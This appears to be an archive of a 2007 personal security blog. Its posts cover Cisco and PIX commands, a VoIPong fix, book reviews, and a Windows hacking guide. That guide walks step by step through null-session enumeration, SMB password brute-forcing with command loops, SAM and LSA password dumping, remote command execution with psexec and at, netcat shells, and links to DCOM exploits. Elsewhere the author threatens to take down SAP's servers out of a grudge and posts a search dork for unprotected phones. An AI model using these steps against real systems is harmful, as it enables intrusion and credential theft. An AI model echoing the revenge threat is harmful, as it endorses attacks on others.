Friday, June 29, 2007

Youtube's 40+ security vulnerabilities

The other night I was chatting with Christ1an about web security and I just happened to realise that he was actually the one who killed YouTube. Some of you might already know that he was the one who discovered around 40+ vulnerabilities in YouTube and became famous overnight. Anyway, Christ1an is based in Germany and he is only a student, but heck, he is a guru in web security. He was interviewed by The Register and Google actually thanked him for his work.

Recently Christ1an launched http://planet-websecurity.org/ with the intention of bringing together similarly themed news and rants related to web security and displaying them in one place. Visit his blog on the right side of my feed or check it out here.

The Hacka Man

Thursday, June 28, 2007

SAP

I always wanted to work for SAP because they pay huge money. I remember being interviewed by SAP back in Singapore. The first interview took at least 1-2 hours of conversation and I passed it. HR invited me for a second interview; however, this time the interviewer was crap. He asked all sorts of questions and I succinctly answered them without beating around the bush. Either he didn't get what I was trying to say or he is just plain talkative. I stood firmly by what I said, and he did not believe me, while saying that I was a perfect candidate for the position and looked like what they were searching for. ALL BLOODY CRAP!!!! A bunch of liars. They truly antagonised me and I loathe them for that. I am a straight person: if you don't wish to hire me, that's fine, just tell me straight and I will understand. You don't have to set up a bunch of stories and be a coward.

Well, good luck to you, SAP. If I have a chance to audit your system, I promise I will bring down all your SAP/R3 servers and the other external servers you have. Better protect your RFC or you will be OWNED!

The Hacka Man

Wednesday, June 27, 2007

Cisco show mem vs show processes memory sorted

To check a router's or firewall's CPU and memory usage, I always issue show mem or show processes cpu to see what is causing the router to have high CPU or memory utilization. However, I realised that the show mem command output is not as nice as it seemed to be. I was looking at the ioshints blog and found the same command with a few tweaks here and there. This command provides better output than show mem, which is very important for troubleshooting purposes. See below:

show processes memory sorted

show processes cpu sorted 1min

show processes cpu sorted 7min

From cisco:

http://www.cisco.com/warp/public/63/showproc_cpu.html

http://www.cisco.com/warp/public/63/highcpu.html

For Cisco and Juniper command:

http://networking.ringofsaturn.com/Cisco/ciscojuniper.php

Tuesday, June 26, 2007

Designing and Implementing Linux Firewalls with QoS using netfilter, iproute2, NAT and l7-filter

I was invited by Lucian to review this book. Lucian actually sent me a copy of this book to read and I was happy upon receiving it. Well, I am someone who loves firewall and security stuff, especially Linux and Cisco. This book is absolutely amazing. For beginners, there is a lot of technical configuration you can read and learn, and for experts, this book will guide you to some topics that might interest you. I would really like to put this book into practice; however, based on my current situation, I will only have the time to read and understand the concepts. I would highly rate this book 4.5/5 and recommend it to anyone who wants to learn firewalls at a low level.

VoIPong installation error

For those of you who try to install VoIPong and get installation errors like the ones below, the problem and solution are shown below:

Murat Balaban writes:

>
> Hi Henrique,
>
> Which UNIX user is trying to run voipong? It seems a non-root
> user is running it, but does not have the sufficient privileges
> to open the ethernet device in promisc mode.
>
> Plus, you seem to have problems with the permissions of
> your modules directory. That directory should be owned by
> the same user running voipong.
>
> Thursday, May 31, 2007, 8:41:56 PM, you wrote:
>
> > Release 2.0, running on DINP70759 [Linux 2.4.25-klg #1
> > SMP Ter Abr 6 09:28:24 BRT 2004 i686]
>
> > (c) Murat Balaban http://www.enderunix.org/
> > 31/05/07 14:34:14: EnderUNIX VOIPONG Voice Over IP
> > Sniffer starting...
> > 31/05/07 14:34:14: Release 2.0 running on DINP70759
> > [Linux 2.4.25-klg #1 SMP Ter Abr 6 09:28:24 BRT 2004
> > i686]. (c) Murat Balaban http://www.enderunix.org/
> > [pid: 669]
> > 31/05/07 14:34:14: Default matching algorithm: lfp
> > 31/05/07 14:34:14: error:
> > securemod(/usr/local/etc/voipong/modules/modvocoder_pcma.so):
> > gid: got 50, expected 0
> > 31/05/07 14:34:14: error:
> > securemod(/usr/local/etc/voipong/modules/modvocoder_pcmu.so):
> > gid: got 50, expected 0
> > 31/05/07 14:34:14: loaded 0 module(s)
> > 31/05/07 14:34:14: libpcap start failure:
> > pcap_open_live: SIOCGIFHWADDR: No such device
>
> > 31/05/07 14:34:14: PID 669 [parent: 653]: exited with
> > code: 1. uptime: .
>
I had the same problems and solved them using this command:
sudo chown -R root:root /usr/local/etc/voipong/modules/modvocoder_pcm*
Also, for the voipongnets, I created the file with:
touch /usr/local/etc/voipong/voipongnets
This will solve the errors shown above.
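As an added example (not part of VoIPong), a Python pre-flight check for the ownership condition behind the securemod error above: the reply in the thread says a module loads only if it is owned by the user and group running voipong (root, i.e. uid/gid 0, when started with sudo). The extra check for group- or world-writable modules and the constructed sample files in demo() are assumptions of mine, not VoIPong behaviour.

```python
"""Pre-flight check for the ownership condition behind the
'securemod(...): gid: got 50, expected 0' error quoted above.
Assumed rule (from the reply in the thread): a module must be owned by the
user/group that runs voipong; writable-by-others is an extra sanity check."""
import os
import stat
import tempfile
from pathlib import Path

def check_module(path, expected_uid=0, expected_gid=0):
    """Return a list of problems for one module file; [] means it would load."""
    st = os.stat(path)
    problems = []
    if st.st_uid != expected_uid:
        problems.append(f"uid: got {st.st_uid}, expected {expected_uid}")
    if st.st_gid != expected_gid:
        problems.append(f"gid: got {st.st_gid}, expected {expected_gid}")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        problems.append("mode: writable by group or others")
    return problems

def check_module_dir(moddir, expected_uid=0, expected_gid=0, pattern="modvocoder_*.so"):
    """Check every vocoder module in moddir -> {filename: [problems]}."""
    return {p.name: check_module(p, expected_uid, expected_gid)
            for p in sorted(Path(moddir).glob(pattern))}

def demo():
    """Constructed sample: two empty module files in a temp dir, one left
    group-writable.  Returns (report using the creator's uid/gid, report for
    a deliberately wrong gid) so both failure modes can be compared."""
    d = Path(tempfile.mkdtemp())
    good, bad = d / "modvocoder_pcma.so", d / "modvocoder_pcmu.so"
    for f in (good, bad):
        f.write_bytes(b"")
    good.chmod(0o644)
    bad.chmod(0o664)  # group-writable: should be flagged
    uid, gid = os.stat(d).st_uid, os.stat(d).st_gid
    as_creator = check_module_dir(d, uid, gid)
    gid_mismatch = check_module(good, uid, gid + 1)  # mirrors 'gid: got X, expected Y'
    return as_creator, gid_mismatch

if __name__ == "__main__":
    report, mismatch = demo()
    print(report)    # pcma: [], pcmu: ['mode: writable by group or others']
    print(mismatch)  # ['gid: got <gid>, expected <gid+1>']
    # Real run as root: print(check_module_dir("/usr/local/etc/voipong/modules"))
```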

Monday, June 25, 2007

Snom phones web interface exposed to public.

I was just researching hard and soft phones and I came across Snom VoIP phones. I don't know much about the phones; however, a simple Google dork gave me a bad result. Default installations of the phone are not password protected. Check it out:

"(e.g. 0114930398330)" snom


Sunday, June 24, 2007

Hakin9 X Hackathology

This past week, I was invited by hakin9 magazine to write an article about the latest hacking skills. I am still thinking about a topic to write on. There are different types of hacks and I am in a dilemma choosing one. After pondering for some time, I think I would love to write about VoIP hacks. Personally, because VoIP is a subset of network security, I think it's best to write something that I am good at. I have already set up a PBX server and now it's up to the guys at hakin9. The hakin9 team is a bunch of really cool and nice guys. They gave me a free copy of their magazine and once my article is published, they will also send me a copy of the published issue. I will keep you guys updated on this. Let me know what you guys think.

Friday, June 22, 2007

David Litchfield new Oracle book

I have been wanting to learn more about Oracle hacking and I would not say I am really good at Oracle security. I managed to set up an Oracle database server and do some simple exploitation and auditing; however, I know that to be good in that aspect, I would need to focus most of my time on exploiting and learning the techniques for hacking the database. This past week, it came to my attention that David Litchfield (Oracle security guru; google him to find out more) has published a book called the Oracle Hacker's Handbook. I highly recommend that anyone who loves Oracle security purchase this book. Although I have not yet laid my hands on this book, it will soon be on my bookshelves.

Monday, June 18, 2007

Using ftp with CUTCP telnet

Check out CUTCP

"Telnet is a program used to interactively log in to a remote computer. CUTCP telnet is a program that runs on a PC and is used in CIRCA labs and elsewhere on campus to log in to remote computers. This program can also function as an ftp server when you are logged in to a remote host. This means that you can use the host's ftp client to connect back to yourself. Here's how you do it:

1) First use telnet to log in to the remote host.

2) Press Alt/T. This will generate an ftp command with the proper network address and start the ftp client program on the interactive host.

3) When it asks for a name, enter anything.

4) When it asks for a password, press Alt/W. This will provide a hidden password to authenticate the connection.

Remember that when you have completed this connection, your PC is an ftp server, and the interactive host is running an ftp client. To transfer a file from the interactive host to your PC, use the put command. To transfer a file from the PC to the interactive host, use the get command."

Sunday, June 17, 2007

Regular Expressions with Cisco IOS

I was reading some Cisco stuff today, and I have known for a long time that Cisco IOS allows regular expressions to simplify search tasks and for other uses. Well, back then I did not research it much, but I just came across two sites which provide more explanation of Cisco IOS regex.

http://www.cisco.com/univercd/cc/td/doc/product/software/ios122/122cgcr/ftersv_c/ftsappx/tcfaapre.htm

http://www.nil.com/ipcorner/EnhanceIOSUI/

Saturday, June 16, 2007

Cisco Router's DNS server to kill browser advertisement

I just happened to stumble across the ioshints blog. He mentioned something about the Cisco router's DNS server having a way to prevent unwanted website advertisements. You guys can read more at: http://www.nil.com/ipcorner/RouterDNS/

Hacking Old Skoolz Windows

Port 135 (client-server communications)

Port 139, 445 (authentication and file sharing)

Port 137,138 (NetBIOS browser, name and lookup functions)



Look for port 135 endpoint mapping, which includes Microsoft Outlook, Exchange and the Messenger Service.

Nmap the server to look for port 135.

Run rpcscan or epdump against the server over TCP or UDP port 135.

If UDP ports 1028 and 1029 or TCP port 1025 are open, run rpcscan over those ports.

Look for IFID 12345778-1234-abcd-ef00-0123456789ab and 12345778-1234-abcd-ef00-0123456789ac for the LSA and SAMR interfaces respectively. They can be found on all Windows NT OSes using named pipes accessible through an SMB session over TCP port 139 or 445.

Run a walksam query if the SAMR interface is present to glean user information.

Run rpcclient from BackTrack if a valid username and password are given. The LSARPC interface must be present.

Compromise the admin password using the brute force tool WMICracker.

Use Remoxec to execute arbitrary commands.

Verify whether the server is vulnerable to RPC DCOM exploits. If patches MS03-026 and MS03-039 are applied, nothing can be done. Else download exploits from

http://packetstormsecurity.org/0307-exploits/dcom.c
http://packetstormsecurity.org/0307-exploits/DComExpl_UnixWin32.zip
http://packetstormsecurity.org/0307-exploits/rpcdcom.101.zip
http://packetstormsecurity.org/0307-exploits/oc192-dcom.c
http://examples.oreilly.com/networksa/tools/dcom-exploits.zip
http://www.securityfocus.com/bid/8205/exploit/


The DCOM interface can be exploited through:

TCP and UDP port 135 (through the RPC server service)
TCP ports 139 and 445 (through SMB and named pipes)
TCP port 593 (through COM Internet Services, if installed)
Use kaHt2 to exploit a remote shell.
Use the SPIKE msrpcfuzz fuzzer to do stress tests.


-----------------------------------------------------------------------------------------

NetBIOS Name Service UDP port 137

Dumping the NetBIOS table: nbtstat -A 192.168.1.152

Local Area Connection:
Node IpAddress: [192.168.1.20] Scope Id: []

    NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    CARAA          <00>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered
    CARAA          <20>  UNIQUE      Registered
    WORKGROUP      <1E>  GROUP       Registered

    MAC Address = 00-0D-88-CB-30-0B

------------------------------------------------

<00> unique: hostname
<00> group: domain name
<03> unique: Messenger service running for that computer
<03> unique: Messenger service running for that individual logged-in user
<20> unique: Server service running
<1D> group: master browser name for the subnet
<1B> unique: domain master browser name, identifies the PDC for that domain
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0661
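As an added example (not a tool from these notes), a small Python parser that reads an nbtstat -A table like the one above and decodes each suffix into the service the host advertises, using the suffix list from the notes; the meaning given for <1E> GROUP (browser service elections) is not in the list above and is filled in here. The sample table is constructed from the output shown in the notes.

```python
"""Parse 'nbtstat -A' output like the table above and explain what each
<suffix> advertises: what a host reachable on UDP/137 reveals about itself.
Added example, not a tool from the notes; the <1E> GROUP meaning (browser
elections) is not in the list above and is filled in here."""
import re

# (suffix, type) -> service, following the list above.  Type matters:
# <00> UNIQUE is the host name but <00> GROUP is the workgroup/domain.
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "hostname",
    ("00", "GROUP"): "domain/workgroup name",
    ("03", "UNIQUE"): "Messenger service (computer or logged-in user)",
    ("20", "UNIQUE"): "Server service (file sharing) running",
    ("1D", "GROUP"): "master browser for the subnet",
    ("1B", "UNIQUE"): "domain master browser (PDC)",
    ("1E", "GROUP"): "browser service elections",
}
ROW = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)\s*$")
MAC = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")

def parse_nbtstat(text):
    """Return (rows, mac); each row is a dict carrying the decoded meaning."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # headers, separators, blank lines
        name, suffix, kind, status = m.groups()
        suffix = suffix.upper()
        rows.append({"name": name, "suffix": suffix, "type": kind, "status": status,
                     "meaning": SUFFIX_MEANING.get((suffix, kind), "unknown suffix")})
    mac = MAC.search(text)
    return rows, (mac.group(1) if mac else None)

def exposed_services(text):
    """Set of services the remote host advertises as Registered."""
    return {r["meaning"] for r in parse_nbtstat(text)[0] if r["status"] == "Registered"}

# Constructed sample: the name table shown in the notes above.
SAMPLE = """\
Node IpAddress: [192.168.1.20] Scope Id: []

       Name               Type         Status
    ---------------------------------------------
    CARAA          <00>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered
    CARAA          <20>  UNIQUE      Registered
    WORKGROUP      <1E>  GROUP       Registered
    MAC Address = 00-0D-88-CB-30-0B
"""
```

Running parse_nbtstat(SAMPLE) shows CARAA advertising the Server service (<20>), i.e. file sharing is on, and the host's MAC address, which is the kind of detail a blocked or filtered UDP/137 would not give away.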


NetBIOS Datagram Service UDP port 138
http://www.securityfocus.com/advisories/2556


NetBIOS Session Service TCP port 139

Connect through a null session:

net use \\192.168.1.152\IPC$ "" /user:""
net view \\192.168.1.152
Use tools like enum, GetAcct and winfo to enumerate more info.


Brute force user passwords through the NetBIOS session service with tools like SMBCrack and SMB-AT, or use a Windows FOR loop to find the password.

1. Create a file credentials.txt with password and username pairs:

Password Username
"" Administrator
Password Administrator
Admin Administrator

2. FOR /F "tokens=1,2*" %i in (credentials.txt) do net use \\192.168.1.152\IPC$ %i /user:%j

3. Using the NetBIOS Auditing Tool (nat) in a loop:
FOR /L %i IN (1,1,254) DO nat -u userlist.txt -p passlist.txt 192.168.1.%i > out.txt


Connect through a valid user:
Use smbclient to enumerate more info.
net use \\192.168.1.152\C$ * /user:scadmin (will prompt for a password)
net use \\192.168.1.152\C$ ronald3211 /user:scadmin
at \\192.168.1.152 00:04 c:\Windows\system32\cmd.exe

Modify and access registry keys using:
Regdmp.exe
Regini.exe
Reg.exe

Accessing the SAM Database and LSASS

Pwdump5
Lsadump2



CIFS service running on TCP and UDP port 445

SMB-AT to enumerate user and system info.
smbserverscan to scan for SMB-related ports.
smbgetserverinfo to get server info.
smbNAT to provide more details about the server info.

smbdumpusers to enumerate over ports 139 and 445.
smbdumpusers -i 192.168.1.152 -m 2 -P1

smbbf to run brute-force password grinding attacks against both NetBIOS and CIFS services.
smbbf -i 192.168.1.152 -p wordlist.txt -u users.txt -v -P1

The following need an admin username and password:
samrdump to list all usernames on the server
rpcdump to list all endpoint bindings

Registry path controlling null sessions: HKLM\SYSTEM\CurrentControlSet\Control\Lsa
RestrictAnonymous = 0, 1 or 2

Use pwdump5 to capture the SAM file.
Use netcat to open a shell on the remote OS.
Use psexec through port 139 or 445 to execute commands:
psexec \\192.168.1.152 -u Admin -p password -s cmd.exe


IIS buffer overflow

IIS 5.0 SSL remote root exploit: use thciisslame.

Wednesday, June 13, 2007

Cisco's PIX/ASA TCP flags syntax

Have you guys ever wondered how the PIX or ASA firewall's TCP 3-way handshake works? Well, it's absolutely similar to how the normal TCP/IP handshake works, just a little different in terms of the syntax. For instance, the SYN flag in PIX is known as saA. For troubleshooting purposes, you would however need to know these flags in PIX/ASA. I have summarised a table of the flags and how they work.

Tuesday, June 12, 2007

PIX firewall troubleshooting commands

I am adding some commonly used PIX firewall troubleshooting commands. For those of you who troubleshoot the firewall, you should familiarise yourself with these commands. Handy yet powerful.

1. show xlate, show xlate detail - display NAT translations and their details

2. show connection, show connection detail - display the details of connections built in the firewall

3. show service-policy - display inspection policies

4. show local-host 192.168.1.1 - display translation, AAA and connection information for a host

5. show asp drop - show the number of packets dropped while processing packets

6. show mem - display memory usage on the PIX

7. show cpu usage - display CPU usage over a time period

8. show traffic - display total traffic transmitted and received on each individual interface of the PIX

9. show block and show cpu usage together can determine whether the firewall is overloaded.

Of course there are many other things you would need to know, like the debug commands, capture commands, show logging, show running logging and show logging setting. If you guys need to know more, just email me and I will guide you.